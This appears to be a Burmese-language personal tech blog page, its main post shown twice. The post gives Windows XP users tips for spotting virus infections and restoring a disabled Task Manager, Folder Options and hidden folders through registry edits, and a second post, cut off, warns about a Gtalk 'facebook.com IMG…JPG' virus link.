က်ေနာ္လဲ နည္းနည္းအလုပ္မ်ားတာနဲ႔ပို႔္စ္အသစ္ေတြမတင္ျဖစ္ဘူး။ ဗိုင္းရပ္စ္ရွိ၊ မရိဘယ္လိုသိႏိုင္မလဲ။
ေမးလာတဲ့ညီေလးအတြက္ ဒီပို႔္စ္နဲ႔အေျဖေပးလိုက္တယ္။ ဒီပို႔စ္က က်ေနာ္ကိုယ္ပိုင္ေရးတာမဟုတ္
google က ရလာတဲ့ပို႔စ္ပါ။ ဘာပဲျဖစ္ျဖစ္အက်ိဳးမ်ားသည့္အတြက္ ယူသံုးထားလိုက္တယ္။

ကုိယ့္ကြန္ျပဴတာမွာ Virus ႐ွိ၊ မ႐ွိကုိ အလြယ္တကူ စစ္ေဆးၾကည့္႐ႈႏုိင္ပါသည္။ Antivirus Software မ႐ွိဘဲ စစ္ေဆးႏုိင္တဲ့ နည္းလမ္းမ်ားစြား႐ွိပါသည္။

အရင္ဆုံးစစ္ေဆးၾကည့္႐ႈ စစ္ေဆးၾကည့္႐ႈမွာကေတာ့

* Tools Menu က Folder Options ေပ်ာက္ေနျခင္း

* Command Prompt, Registry, Task Manager ကုိ၀င္တုိင္း ကြန္ုျပဴတာ Restart က်ေနျခင္း

* Administrator Account ျဖစ္ရဲ႕သားနဲ႕ Registry Editor, Task Manager ဖြင့္မရျခင္း

* Hidden Files, Hidden System Files ေတြကုိ ေဖာ္မရျဖစ္ေနျခင္း

* Folder ေတြကုိ Double Click ႏွိပ္လုိက္တုိင္း My Document Folder ပဲေပၚေနျခင္း၊ ဒါမွမဟုတ္ Folder လည္း မပြင့္ ဘာမွလည္းမတတ္လားျခင္း

* Memory Stick ရဲ႕ Drive ေပၚမွာ right click ႏွိပ္လုိက္ရင္ Open က ထိပ္ဆုံးေရာက္ေန မယ့္အစား Autoplay က ထိပ္ဆုံးေရာက္ေနျခင္း

* Drive ေတြ၊ Memory Stick ေတြကို Double click ႏွိပ္လုိက္တုိင္း OpenWith Box ပဲေပၚလာျခင္း

* Memory Stick ထဲက Folder ေတြေပၚမွာ Right click ႏွိပ္ၿပီး properties ကိုေ႐ြးရင္ Type မွာ File Folder လုိ႕ေပၚေနမယ့္အစား Application လုိ႕ေပၚေနျခင္း

* My Folder ဆုိတဲ့ Folder ေအာက္မွာ MyFolder.exe ကုိေတြ႕ျမင္ေနရျခင္း (Folder ၏ နာမည္ႏွင့္တူေသာ exe ၀င္ေရာက္ေနျခင္းကုိဆုိလုိျခင္းျဖစ္ပါသည္။)

* Task Manager ကုိဖြင့္ပါ။ (Ctrl+Alt+Del). Flashy, Fun, New Folder စတဲ့ Process ေတြနဲ႕ မသကၤာဖြယ္ရာ Process ေတြ Run ေနျခင္း (Run ေနတယ္ဆုိရင္ ဘယ္ Memory Stick မွမတပ္ပါႏွင့္။ Virus ခ်က္ခ်င္း ကူးစက္ခံႏုိင္ရပါတယ္။ Stick ကုိ Format ခ်လည္းအပုိပါပဲ။ ကုိယ္က Format ခ်ၿပီးတာနဲ႕ Virus ကျပန္၀င္ႏုိင္ပါသည္။)

အထက္ပါ အခ်က္ေတြထဲက တစ္ခုခု ျဖစ္ေနရင္ ကြန္ျပဴတာမွာ ေသခ်ာသေလာက္နီးပါး Virus or Trojan or spyware တစ္ခုခု စက္ထဲမွာ႐ွိေနၿပီလုိ႕ ယူဆႏုိင္ပါသည္။ အျခားစစ္ေဆးနည္းေတြ အမ်ားႀကီး႐ွိပါေသးသည္။ ပုိေသခ်ာေအာင္ Antivirus Software တစ္မ်ိဳးမ်ိဳးကုိ install လုပ္ၿပီး Full Scan Run ၾကည့္ပါ။ Virus ၀င္တာေသခ်ာၿပီးဆုိရင္ေတာ့ Virus ကုိ အရင္သတ္လုိက္ပါ။ Virus Backup ေတာင္မလုပ္ထားပါႏွင့္။ Backup လုပ္ထားတဲ့ Virus ကအႏၱရာယ္ျဖစ္လာႏုိင္ပါသည္။ တကယ့္ျပႆနာက Virus ေတြကုိ အျပတ္ရင္းၿပီးသည့္တုိင္ေအာင္ Folder Options လုိ Feature မ်ိဳး ျပန္မေပၚလာဘူးဆုိရင္ Hard Disk ကုိ Format ခ်ၿပီး Windows အသစ္တင္တာမ်ိဳး မလုပ္ပါနဲ႕။ Folder Option, Task Manager and Registry တုိ႕ကုိ Tools တခ်ိဳ႕အသုံးျပဳၿပီး ျပန္လည္ေဖာ္ထုတ္လုပ္ရပါတယ္။

အရင္ဆုံး System Restore Point တစ္ခုကို ဖန္တီးပါ။
Start > All Programs > Accessories > System Tool > System Restore ကုိဖြင့္ပါ။ Create a restore point ကုိေ႐ြးၿပီး Next ကုိႏွိပ္ပါ။ Restore point description မွာ နာမည္တစ္ခုေပးပါ။ (ဥပမာ Before Repair ဆုိတာလုိမ်ိဳးေပါ့။) ၿပီးရင္ Create ကုိႏွိပ္ပါ။ Restore Point Created လုိ႕ေပၚလာရင္ Restore point တစ္ခုကုိ ေအာင္ျမင္စြာဖန္တီးႏုိင္ပါၿပီ။ Close ကုိႏွိပ္ၿပီး ထြက္ပါ။

Registry Editor ကုိအသုံျပဳၿပီး ျပင္ဆင္မွာ ျဖစ္လုိ႕ Registry Database ကုိ backup လုပ္ထားနည္း

Start > Run ကုိဖြင့္ပါ။ regedit လုိ႕႐ုိက္ထည့္ပါ။ File > Export ကုိေ႐ြးပါ။ နာမည္တစ္ခုကုိ ေပးၿပီး save လုပ္ပါ။

Windows ကုိ Repair လုပ္ႏုိင္ဖုိ႕ အတြက္ Windows XP install CD တစ္ခ်ပ္႐ွိထာဖုိ႕လုိပါလိမ့္မယ္။ Windows CD တုိင္းကေတာ့ Windows ကုိ Repair လုပ္ေပး ႏုိင္မွာ မဟုတ္ပါဘူး။ Windows XP Professional Service Pack 8 in 1 ဆုိတဲ့ CD နဲ႔ဆုိရင္အားလုံးအဆင္ေျပႏုိင္ပါသည္။ အဲဒီ CD နဲ႕ Windows XP ကုိ Repair လုပ္ႏုိင္ပါတယ္။

System Restore Point နဲ႕ Registry ကုိ backup လုပ္ၿပီးၿပီးဆုိရင္ အေရးႀကီးတာတစ္ခု လုပ္ရပါလိမ့္မည္။ Data ေတြကုိ Backup လုပ္ထားဖုိ႕ပါပဲ။

Task Manager, Registry Editor and Folder Options ကုိေဖာ္ယူျခင္း

Task Manager, Registry Editor and Folder Option ကုိေဖာ္ယူဖုိ႕အတြက္ အရင္ဆုံး ကြန္ျပဴတာမွာ Virus ကင္းဖုိ႕လုိပါသည္။

ပထဆုံး Task Manager ပြင့္၊ မပြင့္ ၾကည့္ပါ။ Start > Run မွာ taskmgr လုိ႕႐ုိက္ထည့္ပါ။ (Crtl + Alt + Del). Task manger has been disabled by your administrator” လုိ႕ေတြ႕ရရင္ Task Manger ကုိ Virus ကေတာ့ပိတ္သြားၿပီလုိ႕ ယူဆႏုိင္ပါတယ္။ Task Manager ကုိ registry ကေနျပန္ဖြင့္ရလိမ့္မယ္။

Start > Run မွာ regedit လုိ႕႐ုိက္ထည့္ပါ။ Registry ပြင့္တယ္ဆိုရင္ Task Manager and Folder Options ကုိ Manual ျပန္ဖြင့္လုိ႕ရပါတယ္။ Registry ကုိဖြင့္ၿပီး
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (AND) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer မွာ No Folder Options ဆုိတဲ့ Key ကုိေတြ႕ရင္ဖ်က္ပါ။ (Right Click > Delete)

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System (AND) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System မွာ “Disabled TaskMgr” ဆုိတဲ့ Key ကုိ ေတြ႕ရင္လည္းဖ်က္ပါ။

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Run (AND) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Policies\Run က Key ေတြအားလုံးကိုလည္းဖ်က္ပါ။ အဲဒါေတြက ကြန္ျပဴတာ ဖြင့္ဖြင့္ခ်င္းမွာ တက္လာမယ့္ Program စာရင္းေတြျဖစ္ပါတယ္။ Virus က အဲဒီ ေနရာကေန စတင္ Run တာပါ။ အားလုံးၿပီးရင္ေတာ့ ကြန္ျပဴတာကုိ Restart ခ်ပါ။ Folder Options and Task Manager ျပန္ရမရစစ္ပါ။ ျပန္မရဘူးဆုိရင္ Registry ကုိျပန္ဖြင့္ၿပီး
HKEY_CURRENT_USER\ Software\ Microsoft\Windows\C urrentVersion\ Policies\ Explorer ကုိျပန္သြားပါ။ “No Folder Options” ျပန္ေရာက္ေနတယ္ဆုိရင္ Virus မေသေသးပါ ဘူး။ Virus ကုိအရင္သတ္ပါ။

အကယ္၍ Registry ပြင့္ၿပီး ကြန္ျပဴတာ Restart က်သြားရင္ေတာ့ ကြန္ျပဴတာမွာ Virus ႐ွိေနပါေသးတယ္။ ၿပီးေတာ့ Run လည္း run ေနေသးပါတယ္။ Virus ကင္းေအာင္ အရင္ လုပ္သင့္ပါတယ္။ (Kaspersky ကုိအသုံးျပဳရင္ အဆင္ေျပႏုိင္ပါတယ္။)

ဒါမွမဟုတ္ “Registry editing had been disabled by your administrator” လုိ႕ေတြ႕ရရင္ Registry ကုိလည္း Virus ကပိတ္သြားပါၿပီ။ အဲဒါဆုိရင္ေတာ့ Tools တစ္ခုခုသုံးမွအဆင္ေျပႏုိင္ပါေတာ့မည္။ (e.g Cover XP). အဲဒါေတြအျပင္ iRepair Man လုိ႕ေခၚတဲ့ Program ေလးတစ္ခုကုိ အသုံးျပဳႏုိင္ပါသည္။ သူက Folder Options, Task Manager and Registry ကုိျပန္ဖြင့္ေပးပါလိမ့္မည္။ http://www.isoft.ygn.cc မွာ Download ခ်ယူႏုိင္ပါသည္။

Folder ေတြကုိ Double Click ႏွိပ္လုိက္တုိင္း My Documents Folder ေပၚေနျခင္း၊ ဘာမွမတက္လာျခင္း။

Folder ေတြကုိ Double Click ႏွိပ္လုိက္တုိင္း My Documents Folder ေပၚေနျခင္း၊ ဘာမွမတက္လာျခင္း ျဖစ္ေနၿပီးဆုိရင္ေတာ့ အဲဒီ Folder ဟာ User ရဲ႕ Folder အေရာင္ေဆာင္ထားတဲ့ Virus တစ္ခုပဲျဖစ္ပါတယ္။ အဲဒီ File ကုိ Right click ႏွိပ္ၿပီး Type of file မွာၾကည့္ၾကည့္ပါ။

File Folder လုိ႕ေပၚေနမယ့္အစား Application လုိ႕ေပၚေနတယ္။ User ဟာ Folder ကုိ Double click လုပ္လုိက္ၿပီဆုိတာႏွင့္ ကြန္ျပဴတာထဲကုိ Virus ကတန္း၀င္သြားပါၿပီ။ မ်ားေသာအားျဖင့္ Virus ကုိက္ေနတဲ့ စက္မွာ သြားတပ္မိတဲ့ Memory Stick ေတြမွာ ေတြ႕ရမ်ားပါသည္။

မွိန္ေနတဲ့ Folder ေတြကေတာ့ User ရဲ႕ Folder အစစ္ေတြပါပဲ။ ထင္းေနတဲ့ Folder ေတြကေတာ့ Folder အေယာင္ေဆာင္ File ေလးေတြပဲျဖစ္ပါတယ္။ File ကုိ Select လုပ္လုိက္တဲ့ အခါ Detail မွာ Application လုိ႔ေပၚေနတာကုိ သတိထားမိမွာပါ။ မွိန္ေနတာေလးေတြကုိ ျမင္ရတယ္ဆုိရင္ေတာ့ ဒီ Folder ေတြပါ၀င္တဲ့ Drive တစ္ခုလုံးကုိ Virus Scan စစ္ေပးပါ။ ထင္းေနတဲ့ အေယာင္ေဆာင္ Virus အားလုံးကုိေတာ့ Antivirus Software ကဖ်က္သြားပါလိမ့္မယ္။ မွိန္ေနတဲ့ Folder ေတြကုိ Select လုပ္ၿပီး File > Properties ကုိေ႐ြးပါ။ Hidden မွာ Click ျဖဳတ္ပါ။ Apply > OK ကုိႏွိပ္ပါ။ ျပန္ျမင္ရပါလိမ့္မည္။

တကယ္လုိ႕ မျမင္ရေတာ့ဘူးဆုိရင္ Tools > Folder Options > View > Do not show hidden files and folder ကုိေ႐ြးထားမိလုိ႕ မျမင္ရတာပါ။ အဲဒါကို Show hidden files and folder ကုိ ေျပာင္းေ႐ြးရင္ Hide ျဖစ္ေနတာေတြျပန္ျမင္ရလာမွာပါ။ တစ္ခါတစ္ေလမွာ Show hidden files and folder ကုိေ႐ြးတာေတာင္ Tools > Folder Options > View > Do not show hidden files and folders ကုိျပန္ေ႐ြးၾကည့္ရင္ Do not Show ပဲျပန္ျဖစ္ေနတတ္ပါတယ္။ (အဲဒါက Rootkit ေတြေၾကာင့္ျဖစ္တဲ့ ျပႆနာပါ။ Windows ကုိ repair လုပ္မွျပန္ေကာင္း လာေတာ့မွာ ျဖစ္ပါတယ္။) ေနာက္ထပ္တစ္ခုကေတာ့ keyboard ေပၚက F3 ကုိႏွိပ္ပါ။ Search Box တက္လာရင္ All files and folders ကုိေ႐ြးပါ။ More advanced Options က Search hidden files and folders ကုိအမွန္ျခစ္လုပ္ေပးပါ။

All or part of the file name မွာ *.* လုိ႕႐ုိက္ထည့္ၿပီး Search ကုိႏွိပ္ပါ။ မွိန္ေနတဲ့ Folder ေတြကုိ select လုပ္ၿပီး File > Properties ကုိေ႐ြး၊ Hidden မွာ အမွန္ျခစ္ျဖဳတ္ၿပီး Apply > OK ကုိေ႐ြးလုိက္ရင္ ရပါၿပီ။

သူမ်ားစက္မွာ သြားတပ္လာတဲ့ Memory stick ကုိ ကုိယ္စက္မွာတပ္ၿပီးရင္ Double click မႏွိပ္လုိက္ပါႏွင့္။ Virus ပါလာတယ္ဆုိရင္ ခ်က္ခ်င္းကူးႏုိင္ပါသည္။ Antivirus Software ႏွင့္ Scan အရင္စစ္ၾကည့္ပါ။ Antivirus Software မ႐ွိဘူးဆုိရင္ Drive ကုိ Right Click ႏွိပ္ၾကည့္ပါ။ Open ကထိပ္ဆုံးေရာက္ေနရင္ Memory Stick ထဲမွာ Virus ၀င္ေနပါတယ္။ Antinivirus Software တစ္ခုခုတင္ၿပီးေတာ့ Scan လုပ္ကုိလုပ္ရပါေတာ့မည္။
Saw Linux  /  8:47 AM  /    /  No comments
က်ေနာ္လဲ နည္းနည္းအလုပ္မ်ားတာနဲ႔ပို႔္စ္အသစ္ေတြမတင္ျဖစ္ဘူး။ ဗိုင္းရပ္စ္ရွိ၊ မရိဘယ္လိုသိႏိုင္မလဲ။
ေမးလာတဲ့ညီေလးအတြက္ ဒီပို႔္စ္နဲ႔အေျဖေပးလိုက္တယ္။ ဒီပို႔စ္က က်ေနာ္ကိုယ္ပိုင္ေရးတာမဟုတ္
google က ရလာတဲ့ပို႔စ္ပါ။ ဘာပဲျဖစ္ျဖစ္အက်ိဳးမ်ားသည့္အတြက္ ယူသံုးထားလိုက္တယ္။

ကုိယ့္ကြန္ျပဴတာမွာ Virus ႐ွိ၊ မ႐ွိကုိ အလြယ္တကူ စစ္ေဆးၾကည့္႐ႈႏုိင္ပါသည္။ Antivirus Software မ႐ွိဘဲ စစ္ေဆးႏုိင္တဲ့ နည္းလမ္းမ်ားစြား႐ွိပါသည္။

အရင္ဆုံးစစ္ေဆးၾကည့္႐ႈ စစ္ေဆးၾကည့္႐ႈမွာကေတာ့

* Tools Menu က Folder Options ေပ်ာက္ေနျခင္း

* Command Prompt, Registry, Task Manager ကုိ၀င္တုိင္း ကြန္ုျပဴတာ Restart က်ေနျခင္း

* Administrator Account ျဖစ္ရဲ႕သားနဲ႕ Registry Editor, Task Manager ဖြင့္မရျခင္း

* Hidden Files, Hidden System Files ေတြကုိ ေဖာ္မရျဖစ္ေနျခင္း

* Folder ေတြကုိ Double Click ႏွိပ္လုိက္တုိင္း My Document Folder ပဲေပၚေနျခင္း၊ ဒါမွမဟုတ္ Folder လည္း မပြင့္ ဘာမွလည္းမတတ္လားျခင္း

* Memory Stick ရဲ႕ Drive ေပၚမွာ right click ႏွိပ္လုိက္ရင္ Open က ထိပ္ဆုံးေရာက္ေန မယ့္အစား Autoplay က ထိပ္ဆုံးေရာက္ေနျခင္း

* Drive ေတြ၊ Memory Stick ေတြကို Double click ႏွိပ္လုိက္တုိင္း OpenWith Box ပဲေပၚလာျခင္း

* Memory Stick ထဲက Folder ေတြေပၚမွာ Right click ႏွိပ္ၿပီး properties ကိုေ႐ြးရင္ Type မွာ File Folder လုိ႕ေပၚေနမယ့္အစား Application လုိ႕ေပၚေနျခင္း

* My Folder ဆုိတဲ့ Folder ေအာက္မွာ MyFolder.exe ကုိေတြ႕ျမင္ေနရျခင္း (Folder ၏ နာမည္ႏွင့္တူေသာ exe ၀င္ေရာက္ေနျခင္းကုိဆုိလုိျခင္းျဖစ္ပါသည္။)

* Task Manager ကုိဖြင့္ပါ။ (Ctrl+Alt+Del). Flashy, Fun, New Folder စတဲ့ Process ေတြနဲ႕ မသကၤာဖြယ္ရာ Process ေတြ Run ေနျခင္း (Run ေနတယ္ဆုိရင္ ဘယ္ Memory Stick မွမတပ္ပါႏွင့္။ Virus ခ်က္ခ်င္း ကူးစက္ခံႏုိင္ရပါတယ္။ Stick ကုိ Format ခ်လည္းအပုိပါပဲ။ ကုိယ္က Format ခ်ၿပီးတာနဲ႕ Virus ကျပန္၀င္ႏုိင္ပါသည္။)

အထက္ပါ အခ်က္ေတြထဲက တစ္ခုခု ျဖစ္ေနရင္ ကြန္ျပဴတာမွာ ေသခ်ာသေလာက္နီးပါး Virus or Trojan or spyware တစ္ခုခု စက္ထဲမွာ႐ွိေနၿပီလုိ႕ ယူဆႏုိင္ပါသည္။ အျခားစစ္ေဆးနည္းေတြ အမ်ားႀကီး႐ွိပါေသးသည္။ ပုိေသခ်ာေအာင္ Antivirus Software တစ္မ်ိဳးမ်ိဳးကုိ install လုပ္ၿပီး Full Scan Run ၾကည့္ပါ။ Virus ၀င္တာေသခ်ာၿပီးဆုိရင္ေတာ့ Virus ကုိ အရင္သတ္လုိက္ပါ။ Virus Backup ေတာင္မလုပ္ထားပါႏွင့္။ Backup လုပ္ထားတဲ့ Virus ကအႏၱရာယ္ျဖစ္လာႏုိင္ပါသည္။ တကယ့္ျပႆနာက Virus ေတြကုိ အျပတ္ရင္းၿပီးသည့္တုိင္ေအာင္ Folder Options လုိ Feature မ်ိဳး ျပန္မေပၚလာဘူးဆုိရင္ Hard Disk ကုိ Format ခ်ၿပီး Windows အသစ္တင္တာမ်ိဳး မလုပ္ပါနဲ႕။ Folder Option, Task Manager and Registry တုိ႕ကုိ Tools တခ်ိဳ႕အသုံးျပဳၿပီး ျပန္လည္ေဖာ္ထုတ္လုပ္ရပါတယ္။

အရင္ဆုံး System Restore Point တစ္ခုကို ဖန္တီးပါ။
Start > All Programs > Accessories > System Tool > System Restore ကုိဖြင့္ပါ။ Create a restore point ကုိေ႐ြးၿပီး Next ကုိႏွိပ္ပါ။ Restore point description မွာ နာမည္တစ္ခုေပးပါ။ (ဥပမာ Before Repair ဆုိတာလုိမ်ိဳးေပါ့။) ၿပီးရင္ Create ကုိႏွိပ္ပါ။ Restore Point Created လုိ႕ေပၚလာရင္ Restore point တစ္ခုကုိ ေအာင္ျမင္စြာဖန္တီးႏုိင္ပါၿပီ။ Close ကုိႏွိပ္ၿပီး ထြက္ပါ။

Registry Editor ကုိအသုံျပဳၿပီး ျပင္ဆင္မွာ ျဖစ္လုိ႕ Registry Database ကုိ backup လုပ္ထားနည္း

Start > Run ကုိဖြင့္ပါ။ regedit လုိ႕႐ုိက္ထည့္ပါ။ File > Export ကုိေ႐ြးပါ။ နာမည္တစ္ခုကုိ ေပးၿပီး save လုပ္ပါ။

Windows ကုိ Repair လုပ္ႏုိင္ဖုိ႕ အတြက္ Windows XP install CD တစ္ခ်ပ္႐ွိထာဖုိ႕လုိပါလိမ့္မယ္။ Windows CD တုိင္းကေတာ့ Windows ကုိ Repair လုပ္ေပး ႏုိင္မွာ မဟုတ္ပါဘူး။ Windows XP Professional Service Pack 8 in 1 ဆုိတဲ့ CD နဲ႔ဆုိရင္အားလုံးအဆင္ေျပႏုိင္ပါသည္။ အဲဒီ CD နဲ႕ Windows XP ကုိ Repair လုပ္ႏုိင္ပါတယ္။

System Restore Point နဲ႕ Registry ကုိ backup လုပ္ၿပီးၿပီးဆုိရင္ အေရးႀကီးတာတစ္ခု လုပ္ရပါလိမ့္မည္။ Data ေတြကုိ Backup လုပ္ထားဖုိ႕ပါပဲ။

Task Manager, Registry Editor and Folder Options ကုိေဖာ္ယူျခင္း

Task Manager, Registry Editor and Folder Option ကုိေဖာ္ယူဖုိ႕အတြက္ အရင္ဆုံး ကြန္ျပဴတာမွာ Virus ကင္းဖုိ႕လုိပါသည္။

ပထဆုံး Task Manager ပြင့္၊ မပြင့္ ၾကည့္ပါ။ Start > Run မွာ taskmgr လုိ႕႐ုိက္ထည့္ပါ။ (Crtl + Alt + Del). Task manger has been disabled by your administrator” လုိ႕ေတြ႕ရရင္ Task Manger ကုိ Virus ကေတာ့ပိတ္သြားၿပီလုိ႕ ယူဆႏုိင္ပါတယ္။ Task Manager ကုိ registry ကေနျပန္ဖြင့္ရလိမ့္မယ္။

Start > Run မွာ regedit လုိ႕႐ုိက္ထည့္ပါ။ Registry ပြင့္တယ္ဆိုရင္ Task Manager and Folder Options ကုိ Manual ျပန္ဖြင့္လုိ႕ရပါတယ္။ Registry ကုိဖြင့္ၿပီး
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (AND) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\Explorer မွာ No Folder Options ဆုိတဲ့ Key ကုိေတြ႕ရင္ဖ်က္ပါ။ (Right Click > Delete)

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System (AND) HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System မွာ “Disabled TaskMgr” ဆုိတဲ့ Key ကုိ ေတြ႕ရင္လည္းဖ်က္ပါ။

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Run (AND) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Policies\Run က Key ေတြအားလုံးကိုလည္းဖ်က္ပါ။ အဲဒါေတြက ကြန္ျပဴတာ ဖြင့္ဖြင့္ခ်င္းမွာ တက္လာမယ့္ Program စာရင္းေတြျဖစ္ပါတယ္။ Virus က အဲဒီ ေနရာကေန စတင္ Run တာပါ။ အားလုံးၿပီးရင္ေတာ့ ကြန္ျပဴတာကုိ Restart ခ်ပါ။ Folder Options and Task Manager ျပန္ရမရစစ္ပါ။ ျပန္မရဘူးဆုိရင္ Registry ကုိျပန္ဖြင့္ၿပီး
HKEY_CURRENT_USER\ Software\ Microsoft\Windows\C urrentVersion\ Policies\ Explorer ကုိျပန္သြားပါ။ “No Folder Options” ျပန္ေရာက္ေနတယ္ဆုိရင္ Virus မေသေသးပါ ဘူး။ Virus ကုိအရင္သတ္ပါ။

အကယ္၍ Registry ပြင့္ၿပီး ကြန္ျပဴတာ Restart က်သြားရင္ေတာ့ ကြန္ျပဴတာမွာ Virus ႐ွိေနပါေသးတယ္။ ၿပီးေတာ့ Run လည္း run ေနေသးပါတယ္။ Virus ကင္းေအာင္ အရင္ လုပ္သင့္ပါတယ္။ (Kaspersky ကုိအသုံးျပဳရင္ အဆင္ေျပႏုိင္ပါတယ္။)

ဒါမွမဟုတ္ “Registry editing had been disabled by your administrator” လုိ႕ေတြ႕ရရင္ Registry ကုိလည္း Virus ကပိတ္သြားပါၿပီ။ အဲဒါဆုိရင္ေတာ့ Tools တစ္ခုခုသုံးမွအဆင္ေျပႏုိင္ပါေတာ့မည္။ (e.g Cover XP). အဲဒါေတြအျပင္ iRepair Man လုိ႕ေခၚတဲ့ Program ေလးတစ္ခုကုိ အသုံးျပဳႏုိင္ပါသည္။ သူက Folder Options, Task Manager and Registry ကုိျပန္ဖြင့္ေပးပါလိမ့္မည္။ http://www.isoft.ygn.cc မွာ Download ခ်ယူႏုိင္ပါသည္။

Folder ေတြကုိ Double Click ႏွိပ္လုိက္တုိင္း My Documents Folder ေပၚေနျခင္း၊ ဘာမွမတက္လာျခင္း။

Folder ေတြကုိ Double Click ႏွိပ္လုိက္တုိင္း My Documents Folder ေပၚေနျခင္း၊ ဘာမွမတက္လာျခင္း ျဖစ္ေနၿပီးဆုိရင္ေတာ့ အဲဒီ Folder ဟာ User ရဲ႕ Folder အေရာင္ေဆာင္ထားတဲ့ Virus တစ္ခုပဲျဖစ္ပါတယ္။ အဲဒီ File ကုိ Right click ႏွိပ္ၿပီး Type of file မွာၾကည့္ၾကည့္ပါ။

File Folder လုိ႕ေပၚေနမယ့္အစား Application လုိ႕ေပၚေနတယ္။ User ဟာ Folder ကုိ Double click လုပ္လုိက္ၿပီဆုိတာႏွင့္ ကြန္ျပဴတာထဲကုိ Virus ကတန္း၀င္သြားပါၿပီ။ မ်ားေသာအားျဖင့္ Virus ကုိက္ေနတဲ့ စက္မွာ သြားတပ္မိတဲ့ Memory Stick ေတြမွာ ေတြ႕ရမ်ားပါသည္။

မွိန္ေနတဲ့ Folder ေတြကေတာ့ User ရဲ႕ Folder အစစ္ေတြပါပဲ။ ထင္းေနတဲ့ Folder ေတြကေတာ့ Folder အေယာင္ေဆာင္ File ေလးေတြပဲျဖစ္ပါတယ္။ File ကုိ Select လုပ္လုိက္တဲ့ အခါ Detail မွာ Application လုိ႔ေပၚေနတာကုိ သတိထားမိမွာပါ။ မွိန္ေနတာေလးေတြကုိ ျမင္ရတယ္ဆုိရင္ေတာ့ ဒီ Folder ေတြပါ၀င္တဲ့ Drive တစ္ခုလုံးကုိ Virus Scan စစ္ေပးပါ။ ထင္းေနတဲ့ အေယာင္ေဆာင္ Virus အားလုံးကုိေတာ့ Antivirus Software ကဖ်က္သြားပါလိမ့္မယ္။ မွိန္ေနတဲ့ Folder ေတြကုိ Select လုပ္ၿပီး File > Properties ကုိေ႐ြးပါ။ Hidden မွာ Click ျဖဳတ္ပါ။ Apply > OK ကုိႏွိပ္ပါ။ ျပန္ျမင္ရပါလိမ့္မည္။

တကယ္လုိ႕ မျမင္ရေတာ့ဘူးဆုိရင္ Tools > Folder Options > View > Do not show hidden files and folder ကုိေ႐ြးထားမိလုိ႕ မျမင္ရတာပါ။ အဲဒါကို Show hidden files and folder ကုိ ေျပာင္းေ႐ြးရင္ Hide ျဖစ္ေနတာေတြျပန္ျမင္ရလာမွာပါ။ တစ္ခါတစ္ေလမွာ Show hidden files and folder ကုိေ႐ြးတာေတာင္ Tools > Folder Options > View > Do not show hidden files and folders ကုိျပန္ေ႐ြးၾကည့္ရင္ Do not Show ပဲျပန္ျဖစ္ေနတတ္ပါတယ္။ (အဲဒါက Rootkit ေတြေၾကာင့္ျဖစ္တဲ့ ျပႆနာပါ။ Windows ကုိ repair လုပ္မွျပန္ေကာင္း လာေတာ့မွာ ျဖစ္ပါတယ္။) ေနာက္ထပ္တစ္ခုကေတာ့ keyboard ေပၚက F3 ကုိႏွိပ္ပါ။ Search Box တက္လာရင္ All files and folders ကုိေ႐ြးပါ။ More advanced Options က Search hidden files and folders ကုိအမွန္ျခစ္လုပ္ေပးပါ။

All or part of the file name မွာ *.* လုိ႕႐ုိက္ထည့္ၿပီး Search ကုိႏွိပ္ပါ။ မွိန္ေနတဲ့ Folder ေတြကုိ select လုပ္ၿပီး File > Properties ကုိေ႐ြး၊ Hidden မွာ အမွန္ျခစ္ျဖဳတ္ၿပီး Apply > OK ကုိေ႐ြးလုိက္ရင္ ရပါၿပီ။

သူမ်ားစက္မွာ သြားတပ္လာတဲ့ Memory stick ကုိ ကုိယ္စက္မွာတပ္ၿပီးရင္ Double click မႏွိပ္လုိက္ပါႏွင့္။ Virus ပါလာတယ္ဆုိရင္ ခ်က္ခ်င္းကူးႏုိင္ပါသည္။ Antivirus Software ႏွင့္ Scan အရင္စစ္ၾကည့္ပါ။ Antivirus Software မ႐ွိဘူးဆုိရင္ Drive ကုိ Right Click ႏွိပ္ၾကည့္ပါ။ Open ကထိပ္ဆုံးေရာက္ေနရင္ Memory Stick ထဲမွာ Virus ၀င္ေနပါတယ္။ Antinivirus Software တစ္ခုခုတင္ၿပီးေတာ့ Scan လုပ္ကုိလုပ္ရပါေတာ့မည္။

Tuesday, February 28, 2012

Saw Linux  /  6:03 AM  /    /  No comments
ဒီတစ္ရက္ႏွစ္ရက္အတြင္း ဂ်ီေတာ့မွာ facebook.com IMG…JPG Virus လင့္တစ္ခုျပန္ႏွံ႕ေနတယ္။ အဲဒီလင့္ ေအာ္တိုမက္တစ္ မိမိဂ်ီေတာ့ခ်က္ေဘာက္စ္မွာ လာျပီးလင့္ထိုးေပးပါလိမ့္မယ္။ မိမိက အဲဒီလင့္ကိုဖြင့္လိုက္မိရင္ system ထဲေရာက္သြားျပီး မိမိဘေရာက္စာေတြ ဂ်ီေတာ့ေတြကို ပိတ္လုိက္ ဖြင့္လိုက္ျဖစ္ေနပါလိမ့္မယ္။ ေနာက္ ျပီး အသံေတြတစ္ခုမဟုတ္ တစ္ခုထြက္လာပါလိမ့္မယ္။ အဲဒီလင့္ကိုမဖြင့္မိဖို႔ သတိေပးၾကပါ။ အကယ္၍ဖြင့္မိလုိ႔ ၎ဗိုင္းရပ္စ္ကူးဆက္ခံရျပီးဆိုရင္ ေအာက္ပါအခ်က္ေတြနဲ႔ ဗိုင္းရပ္စ္ကိုရွင္းထုတ္ပါ။

facebook.com IMG…JPG Virus ျပန္႔ႏွံ႕ပံု


နည္းလမ္း (၁)

မိမိစက္ကို system restore ျပန္လုပ္ပါ။ လုပ္နည္း…

